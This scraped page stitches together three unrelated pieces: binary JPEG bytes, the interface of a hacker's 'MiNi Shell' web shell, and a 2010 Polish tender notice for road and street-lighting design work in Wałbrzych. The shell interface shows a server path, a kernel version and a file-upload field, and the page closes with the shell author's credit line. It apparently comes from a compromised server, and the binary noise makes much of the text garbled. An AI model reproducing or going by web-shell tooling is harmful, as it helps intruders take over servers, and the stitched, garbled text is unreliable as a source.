JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100512/120431-N-2010.html

<p class="kh_header"><b>Wałbrzych: Wykonanie dokumentacji projektowej na przebudowę ciągu ulicznego: Kresowa -  pl. Sucharskiego - Barbusse a  - Kani</b><br>
<b>Numer ogłoszenia: 120431 - 2010; data zamieszczenia: 12.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Komunikacji , ul. Armii Krajowej 35, 58-302 Wałbrzych, woj. dolnośląskie, tel. 074 6414400, 6414408, faks (074) 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdik.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej na przebudowę ciągu ulicznego: Kresowa -  pl. Sucharskiego - Barbusse a  - Kani.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej przebudowy ciągu ulic: Kresowej pl. Sucharskiego, Barbusse-a , ul. Kani.

Dokumentacja projektowa ma być wykonana z podziałem na dwa Projekty:

Projekt 1 - wykonanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych nie wymagających uzyskania decyzji o pozwoleniu na budowę dla zadania polegającego na przebudowie ciągu ulic Kresowej i Barbusse-a wraz z remontem i naprawą sieci kanalizacji deszczowej.

Projekt 2 - wykonanie dokumentacji projektowej oświetlenia ulicznego w ulicach Kresowej i Barbusse-a. Realizacja zadania wymaga uzyskania pozwolenia na budowę.

Projekt 1 ma zawierać: 
1)	projekt budowlany i projekty wykonawcze w zakresie:
- części drogowej,
- odwodnienia,
- zieleni,
- docelowej organizacji ruchu zakładającej uspokojenie ruchu,
- sieci wodociągowej,
- przebudowy bądź zabezpieczenia kolidujących uzbrojeń,  
2)	przedmiary robót, 
3)	kosztorysy inwestorskie,
4)	szczegółowe specyfikacje techniczne dotyczące wykonania i odbioru robót,
5)	informację dotyczącą bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane odrębnymi przepisami.

Projekt 2 ma zawierać:
1) projekt budowlany, 
2) projekt wykonawczy oświetlenia ulicznego,
3) projekt likwidacji kolizji bądź zabezpieczenia istniejącej infrastruktury,
4) przedmiary robót,
5) kosztorys inwestorski,
6) szczegółowe specyfikacje techniczne dotyczące wykonania i odbioru robót.

Zakres ilościowy zamówienia dla Projektu 1:

1)	projekt budowlany 					             - 6 egz.,
2)	projekty wykonawcze					- 4 egz. dla każdej branży,
3)	przedmiary robót						- 1 egz. dla każdej branży,
4)	kosztorys inwestorski					- 1 egz. dla każdej branży,
5)	formularz przedmiaru robót do wyceny			- 1 egz. dla każdej branży,
6)	specyfikacje techniczne					- 1 egz. dla każdej branży,

Zakres ilościowy zamówienia dla Projektu 2:

1) projekt budowlany 			             	- 6 egz.,
2) projekty wykonawcze 				- 4 egz. dla każdej branży,
3) przedmiary robot 					- 1 egz. dla każdej branży,
4) specyfikacje techniczne				- 1 egz. dla każdej branży,
5) kosztorys inwestorski 				- 1 egz. dla każdej branży,

Całość dokumentacji projektowej należy załączyć również w wersji elektronicznej w formacie doc., xls., pdf., dwg. Pliki muszą być zoptymalizowane pod względem rozmiaru. Jakość zeskanowanych lub wygenerowanych dokumentów, rysunków technicznych i zdjęć powinna umożliwić odczytanie wszystkich detali i cech oraz powinna nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Forma pisemna musi być tożsama z formą cyfrową dokumentacji projektowej.

Wykonawca jest zobowiązany do dokonania wizji lokalnej w celu zapoznania się ze stanem istniejącym dróg oraz sieci i urządzeń w zakresie objętym dokumentacją projektową oraz zdobycia koniecznych informacji do przygotowania oferty.
Projekt 1 
Projekt przebudowy ma obejmować swoim zakresem ciąg uliczny: Kresowa - dł. ok. 360 mb,             pl. Sucharskiego (dz. nr 126, obr. 30 Sobięcin), Barbusse-a  - dł. ok. 290 mb oraz ul. Kani na odcinku od ul. Barbusse-a do budynku nr 9 - dł. ok. 150 - 170 mb (wraz z działką nr 468/1, obr. 30 Sobięcin). 

Projekt 2
W ciągu ulicznym: Kresowa - pl. Sucharskiego - Barbusse-a - Kani, w związku ze złym stanem technicznym oświetlenia ulicznego (skorodowane słupy, nieczynne zasilanie pojedynczych punktów, niesprawne źródła światła) należy zaprojektować nowe oświetlenie drogowe. W opracowaniu uwzględnione powinno być wykonanie nowej infrastruktury elektrycznej z wydzielonym zasilaniem ze stacji wskazanej w TWP. Należy zachować zasilanie istniejącego oświetlenia ulic przyległych.
Warunki przyłączenia do sieci energetycznej dostarczy Zamawiający.

Z uwagi na fakt, że dokumentacja projektowa (Projekt 1 i Projekt 2) będzie stanowiła opis przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego, Wykonawca zobowiązany jest przestrzegać przepisów Ustawy, w szczególności art. 29 - 31. 
Konstrukcja nawierzchni - Projekt 1

Konstrukcję nawierzchni jezdni zaprojektować jak dla dróg o kategorii ruchu KR3 z mas mineralno-asfaltowych, w tym warstwa ścieralna z SMA.
Konstrukcję nawierzchni chodników należy zaprojektować z płyt chodnikowych betonowych 50x50x7.
Urządzenia techniczne własne - Projekt 1

Odwodnienie 
Kanały deszczowe znajdujące się w ulicach przewidzieć do renowacji bądź remontu. Przykanaliki od wpustów ulicznych oraz studzienki należy zaprojektować jako nowe. Studzienki ściekowe zaprojektować jako betonowe wyposażone w osadniki i wpusty żeliwne, które powinny posiadać zabezpieczenie przed kradzieżą. Pokrywy włazowe powinny być wykonane z żeliwa z wypełnieniem betonowym - kl. D. 
Skrzynki zaworowe, studnie rewizyjne na kanałach deszczowych i sanitarnych znajdujące się w jezdniach - przewidzieć w ramach zadania do regulacji wysokościowej. Górne części istniejących studni rewizyjnych w miarę konieczności przebudować i przewidzieć wbudowanie dodatkowo pierścieni odciążających.

Należy zaprojektować przyłącza kanalizacji deszczowej, które będą odprowadzały wody opadowe z budynków zlokalizowanych przy ul. Barbusse-a nr 2, 12, 14, Pl. Sucharskiego nr 3, 6, 6a oraz ulicy Kresowej nr 2, 4. Projekt powinien obejmować budowę przyłączy wyłącznie w granicach pasa drogowego.
Zamawiający udostępni (w wersji papierowej i na nośniku cyfrowym) wyniki z przeprowadzonej w roku 2007 inspekcji kanału deszczowego wykonanego kamerą TV w ulicach Kresowej i Barbusse-a. Należy zaprojektować wymianę przewodów wodociągowych i armatury, według wykazu otrzymanego od WPWiK sp. z o.o. Do wymiany przewiduje się:
1.	Zasuwy: fi40 - 1 szt., fi80 - 3 szt., fi100 - 6 szt.
2.	Hydranty: 9 szt.
3.	Sieci: fi80 na długości ok. 135 m, fi100 na długości ok. 795 m, fi150 - od Placu Sucharskiego 2 w kierunku ul. Zachodniej (poza przebudowywany odcinek drogi).
4.	Przyłącza: fi20 - 19 szt., fi25 - 24 szt., fi32 - 2 szt., fi40 - 2 szt. - projekt powinien obejmować wymianę przyłączy w granicach pasa drogowego.
Dokumentacja projektowa winna również przewidywać usunięcie kolizji z pozostałymi urządzeniami infrastruktury technicznej nie związanej z potrzebami ruchu drogowego, a także z elementami zagospodarowania terenu. W projektach usunięcia kolizji z urządzeniami infrastruktury technicznej winny być zachowane dotychczasowe właściwości użytkowe i parametry techniczne przebudowywanych urządzeń. Wykonawca przygotowuje materiały do uzyskania warunków przebudowy, bądź zabezpieczenia kolidującej infrastruktury technicznej.
W ramach zamówienia Wykonawca zobowiązany będzie także do:

1.	dla Projektu 2 - uzyskania podkładu geodezyjnego do celów projektowych,
2.	uzyskania niezbędnych warunków technicznych do projektowania od organów administrujących siecią dróg związanych z projektem (skrzyżowanie z ul. Kosteckiego - Starosta Wałbrzyski i Zarząd Powiatu Wałbrzyskiego, skrzyżowanie z ul. 1 Maja - Dolnośląska Służba Dróg i Kolei), 
3.	uzyskania warunków technicznych od gestorów sieci nie związanych z funkcją drogi,                             a znajdujących się w granicach opracowania projektowego (o ile takie wystąpią),
4.	dla Projektu 1 - wykonania uproszczonej wielobranżowej dokumentacji projektowej z niezbędnymi uzgodnieniami w zakresie:
a) robót drogowych, kanalizacji deszczowej,
b) stałej (docelowej) organizacji ruchu,
c) zieleni,
d) sieci wodociągowej , 
e) opracowania geotechnicznych warunków posadowienia,
f) ewentualnej przebudowy urządzeń nadziemnych i podziemnych (tj. kanalizacji sanitarnej, sieci energetycznej, gazowej, teletechnicznej lub innych) wynikających z kolizji i warunków gestorów urządzeń, zaakceptowanych przez Zamawiającego, 
5.	przygotowania i uzyskania materiałów niezbędnych do złożenia:
a)	zgłoszenia zamiaru wykonania robót budowlanych - Projekt 1,
b)	wniosku o wydanie decyzji o pozwoleniu na budowę - Projekt 2,
6.	złożenia wniosku o wydanie pozwolenia na budowę - Projekt 2,
7.	sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia, zgodnie z art. 20 ust. 1 pkt 1b ustawy - Prawo budowlane,
8.	wykonania wypisów z rejestru gruntów i sporządzenia wykazu działek zajmowanych pod inwestycję wraz z naniesioną na mapy obrębowe linią rozgraniczenia ulicy,
9.	wykonania wypisów z rejestru gruntów i sporządzenia wykazu działek zajmowanych pod zaplecze budowy (przewidzieć w miarę możliwości lokalizację na działkach będących własnością Gminy Wałbrzych),
10.	wykonania planszy zbiorczej uzbrojenia istniejącego i projektowanego - w kolorze,
11.	sporządzenia specyfikacji technicznych wykonania i odbioru robót budowlanych,
12.	 wykonania przedmiarów robót oraz kosztorysu inwestorskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 2 usługi polegające na opracowaniu wielobranżowej dokumentacji projektowej w zakresie przebudowy dróg o długości min. 410 m. każda.Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnienie ww. warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub ma możliwość dysponowania osobami zdolnymi do wykonania zamówienia, tj. projektantami oraz sprawdzającymi rozwiązania projektowe posiadającymi:
       a) uprawnienia do projektowania w specjalnościach wynikających z zakresu przedmiotu   
zamówienia, w tym:
   - drogowej,
   - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i 
      kanalizacyjnych,
   - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
wymagane przepisami ustawy Prawo Budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz  zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dn. 28  kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. Nr  83 poz. 83 poz. 578 z późn., zm.),
b) będącymi członkami właściwej Okręgowej Izby Inżynierów Budownictwa (posiadającym                                                              
     aktualne zaświadczenie o przynależności do OIIB),
c)	posiadającymi trzyletnie doświadczenie w projektowaniu w danej specjalności (liczone od dnia uzyskania uprawnień)-dotyczy projektantów i sprawdzających,
d)	którzy wykonali co najmniej 2 usługi projektowe zlokalizowane w pasie drogowym w zakresie danej specjalności (dotyczy projektantów)
Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnienie ww. warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza ewentualną zmianę następujących istotnych postanowień umownych:
-zakresu przedmiotu umowy oraz sposobu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, np. zaistnienie warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy, 
- terminu reazlizacji umowy - wskutek wystąpienia okoliczności niezależnych od stron umowy,
- osób wymienionych w ofercie Wykonawcy pod warunkiem wyrażenia zgody przez Zamawiającego, oraz że osoby te będą spełniały warunki opisane w SIWZ,
- innych postanowień umownych w zakresie wynikającym z uregulowań prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy,
-  innych - mogących mieć wpływ na niezakończenie przedmiotu umowy z przyczyn niezależnych od stron
-  w przypadkach określonych we wzorze umowy stanowiącym załącznik nr 8 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdik.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Komunikacji w Wałbrzychu, ul. Armii Krajowej 35, 58-302 Wałbrzych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2010 godzina 10:00, miejsce: Zarząd Dróg i Komunikacji w Wałbrzychu, ul. Armii Krajowej 35, 58-302 Wałbrzych, pok. 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com